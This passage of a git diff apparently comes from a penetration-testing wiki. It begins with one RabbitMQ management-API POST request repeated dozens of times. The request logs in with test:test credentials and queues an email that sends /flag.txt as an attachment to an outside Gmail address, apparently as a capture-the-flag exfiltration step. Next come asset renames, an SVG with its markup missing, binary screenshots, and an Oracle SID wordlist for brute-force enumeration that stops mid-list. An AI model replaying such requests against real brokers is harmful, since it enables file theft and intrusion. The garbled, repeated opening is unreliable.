+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"} + diff --git a/.gitbook/assets/preflight.svg b/.gitbook/assets/preflight.svg new file mode 100644 index 00000000000..cb816648fe9 --- /dev/null +++ b/.gitbook/assets/preflight.svg @@ -0,0 +1,57 @@ + + + + Diagram 3 + Created with Sketch. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/src/images/ram.png b/.gitbook/assets/ram.png similarity index 100% rename from src/images/ram.png rename to .gitbook/assets/ram.png diff --git a/src/images/raptor_oraexec.sql b/.gitbook/assets/raptor_oraexec.sql similarity index 100% rename from src/images/raptor_oraexec.sql rename to .gitbook/assets/raptor_oraexec.sql diff --git a/src/files/Reverse.tar (1).gz b/.gitbook/assets/reverse.tar.gz similarity index 100% rename from src/files/Reverse.tar (1).gz rename to .gitbook/assets/reverse.tar.gz diff --git a/src/images/runes.jpg b/.gitbook/assets/runes.jpg similarity index 100% rename from src/images/runes.jpg rename to .gitbook/assets/runes.jpg diff --git a/.gitbook/assets/sc_create.png b/.gitbook/assets/sc_create.png new file mode 100644 index 00000000000..6fcd3048cc7 Binary files /dev/null and b/.gitbook/assets/sc_create.png differ diff --git a/.gitbook/assets/sc_delete.png b/.gitbook/assets/sc_delete.png new file mode 100644 index 00000000000..2fdd5b37a60 Binary files /dev/null and b/.gitbook/assets/sc_delete.png differ diff --git a/.gitbook/assets/sc_psh_create.png b/.gitbook/assets/sc_psh_create.png new file mode 100644 index 00000000000..4bfb0d00425 Binary files /dev/null and b/.gitbook/assets/sc_psh_create.png differ diff --git a/.gitbook/assets/sc_psh_start.png b/.gitbook/assets/sc_psh_start.png new file mode 100644 index 00000000000..aa2b86ee3c2 Binary files /dev/null and b/.gitbook/assets/sc_psh_start.png differ diff --git a/.gitbook/assets/sc_start_error.png b/.gitbook/assets/sc_start_error.png new file mode 100644 index 00000000000..1dc5bed6cc7 Binary files /dev/null and b/.gitbook/assets/sc_start_error.png differ diff --git a/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (1).png b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (1).png new file mode 100644 index 00000000000..eb261aac083 Binary files /dev/null and b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (1).png differ diff --git a/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (2).png b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (2).png new file mode 100644 index 00000000000..e919aae5295 Binary files /dev/null and b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (2).png differ diff --git a/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (3).png b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (3).png new file mode 100644 index 00000000000..f63efe61426 Binary files /dev/null and b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (3).png differ diff --git a/.gitbook/assets/screenshot-from-2019-04-02-23-44-22.png b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22.png new file mode 100644 index 00000000000..937d40ceef3 Binary files /dev/null and b/.gitbook/assets/screenshot-from-2019-04-02-23-44-22.png differ diff --git a/.gitbook/assets/screenshot-from-2019-04-04-23-51-48.png b/.gitbook/assets/screenshot-from-2019-04-04-23-51-48.png new file mode 100644 index 00000000000..ef27f6ecd22 Binary files /dev/null and b/.gitbook/assets/screenshot-from-2019-04-04-23-51-48.png differ diff --git a/src/images/Screenshot from 2021-03-13 18-17-48.png b/.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png similarity index 100% rename from src/images/Screenshot from 2021-03-13 18-17-48.png rename to .gitbook/assets/screenshot-from-2021-03-13-18-17-48.png diff --git a/src/images/Screenshot from 2021-03-13 18-22-57 (1).png b/.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png similarity index 100% rename from src/images/Screenshot from 2021-03-13 18-22-57 (1).png rename to .gitbook/assets/screenshot-from-2021-03-13-18-22-57.png diff --git a/src/images/Screenshot from 2021-03-13 18-26-27 (1).png b/.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png similarity index 100% rename from src/images/Screenshot from 2021-03-13 18-26-27 (1).png rename to .gitbook/assets/screenshot-from-2021-03-13-18-26-27.png diff --git a/.gitbook/assets/sids-oracle.txt b/.gitbook/assets/sids-oracle.txt new file mode 100644 index 00000000000..ecf01d8c816 --- /dev/null +++ b/.gitbook/assets/sids-oracle.txt @@ -0,0 +1,737 @@ + +ADV1 +ADVCPROD +AIX10 +AIX11 +AIX9 +APEX +ARIS +ASDB +ASDB0 +ASDB1 +ASDB2 +ASDB3 +ASDB4 +ASDB5 +ASDB6 +ASDB7 +ASDB8 +ASDB9 +ASG817 +ASG817P +ASG817T +ATRPROD +ATRTEST +BLA +BOOKS +BUDGET +C630 +CLRExtProc +CTM4_0 +CTM4_1 +CTM4_6 +D +D10 +D8 +D9 +DB +DB01 +DB02 +DB03 +DB1 +DB2 +DB2EDU +DB2PROD +DB2TEST +DB3 +DBA +DBA1 +DBA2 +DBA3 +DBA4 +DBA5 +DBA6 +DBA7 +DBA8 +DBA9 +DBX +DEMO +DEV +DEV0 +DEV01 +DEV1 +DEV2 +DEV3 +DEV4 +DEV5 +DEV6 +DEV7 +DEV8 +DEV9 +DEVEL +DIA1 +DIA2 +DIS +DWH +DWHDB +DWHPROD +DWHTEST +DWRHS +EARTH +ELCARO +EMRS2 +EOF +ERP +ESOR +FINDEC +FINPROD +FNDFS_HR1 +FNDFS_HR2 +FPRD +GR01 +GR02 +GR03 +HCDMO +HEDGEHOG +HPUX10 +HPUX11 +HPUX9 +HR +HR0 +HR1 +HR2 +HR3 +HR4 +HR5 +HR6 +HR7 +HR8 +HR9 +HRDMO +hsagent +HTMLDB +IAGTS +IASDB +INCD +ISD01 +ISD06 +ISP +ISP01 +ISP1 +ISP2 +ISQ1 +ITS +IXOS +KRAUS +KRONOS +LDAP +LIN10 +LIN11 +LIN9 +LINUX101 +LINUX1011 +LINUX1012 +LINUX1013 +LINUX1014 +LINUX1015 +LINUX102 +LINUX1021 +LINUX1022 +LINUX1023 +LINUX1024 +LINUX1025 +LINUX111 +LINUX11106 +LINUX11107 +LINUX112 +LINUX11201 +LINUX817 +LINUX8171 +LINUX8172 +LINUX8173 +LINUX8174 +LINUX901 +LINUX902 +LINUX9021 +LINUX9022 +LINUX9023 +LINUX9024 +LINUX9025 +LINUX9026 +LINUX9027 +LINUX9028 +LINUX92 +LINUX9208 +LUN +MDTEST +MSAM +MV713 +MYDB +NEDB +NORTHWIND +OAS +OAS1 +OAS10 +OAS2 +OAS3 +OAS4 +OAS5 +OAS6 +OAS7 +OAS8 +OAS9 +ODB +OEMREP +OGDP +OID +OJS +OMS +ORA +ORA1 +ORA10 +ORA101 +ORA10101 +ORA10101P +ORA10101T +ORA10102 +ORA10102P +ORA10102T +ORA10103 +ORA10103P +ORA10103T +ORA10104 +ORA10104P +ORA10104T +ORA10105 +ORA10105P +ORA10105T +ORA1011 +ORA1011P +ORA1011T +ORA1012 +ORA1012P +ORA1012T +ORA1013 +ORA1013P +ORA1013T +ORA1014 +ORA1014P +ORA1014T +ORA1015 +ORA1015P +ORA1015T +ORA1021 +ORA1021P +ORA1021T +ORA1022 +ORA1022P +ORA1022T +ORA1023 +ORA1023P +ORA1023T +ORA1024 +ORA1024P +ORA1024T +ORA1025 +ORA1025P +ORA1025T +ORA11 +ORA111 +ORA11106 +ORA11107 +ORA112 +ORA11201 +ORA11202 +ORA11g +ORA2 +ORA3 +ORA4 +ORA5 +ORA6 +ORA7 +ORA8 +ORA805 +ORA806 +ORA815 +ORA816 +ORA817 +ORA8170 +ORA8170P +ORA8170T +ORA8171 +ORA8171P +ORA8171T +ORA8172 +ORA8172P +ORA8172T +ORA8173 +ORA8173P +ORA8173T +ORA8174 +ORA8174P +ORA8174T +ORA8_SC +ORA9 +ORA910 +ORA920 +ORA9201 +ORA9201P +ORA9201T +ORA9202 +ORA9202P +ORA9202T +ORA9203 +ORA9203P +ORA9203T +ORA9204 +ORA9204P +ORA9204T +ORA9205 +ORA9205P +ORA9205T +ORA9206 +ORA9206P +ORA9206T +ORA9207 +ORA9207P +ORA9207T +ORA9208 +ORA9208P +ORA9208T +ORACL +ORACLE +ORADB +ORADB1 +ORADB2 +ORADB3 +ORALIN +ORCL +ORCL0 +ORCL1 +ORCL10 +ORCL10G +ORCL11 +ORCL11G +ORCL2 +ORCL3 +ORCL4 +ORCL5 +ORCL6 +ORCL7 +ORCL8 +ORCL9 +ORCLA +ORCLB +ORCLC +ORCLD +ORCLE +ORCLF +ORCLG +ORCLH +ORCLI +ORCLJ +ORCLK +ORCLL +ORCLM +ORCLN +ORCLO +ORCLP +ORCLP0 +ORCLP1 +ORCLP2 +ORCLP3 +ORCLP4 +ORCLP5 +ORCLP6 +ORCLP7 +ORCLP8 +ORCLP9 +ORCLQ +ORCLR +ORCLS +ORCLSOL +ORCLT +ORCLU +ORCLV +ORCLW +ORCL.WORLD +ORCLX +ORCLY +ORCLZ +ORIONDB +ORTD +P +P10 +P10G +P8 +P8I +P9 +P9I +PD1 +PINDB +PLSExtProc +PORA10101 +PORA10102 +PORA10103 +PORA10104 +PORA10105 +PORA1011 +PORA1012 +PORA1013 +PORA1014 +PORA1015 +PORA1021 +PORA1022 +PORA1023 +PORA1024 +PORA1025 +PORA11106 +PORA11107 +PORA11201 +PORA11202 +PORA8170 +PORA8171 +PORA8172 +PORA8173 +PORA8174 +PORA9201 +PORA9202 +PORA9203 +PORA9204 +PORA9205 +PORA9206 +PORA9207 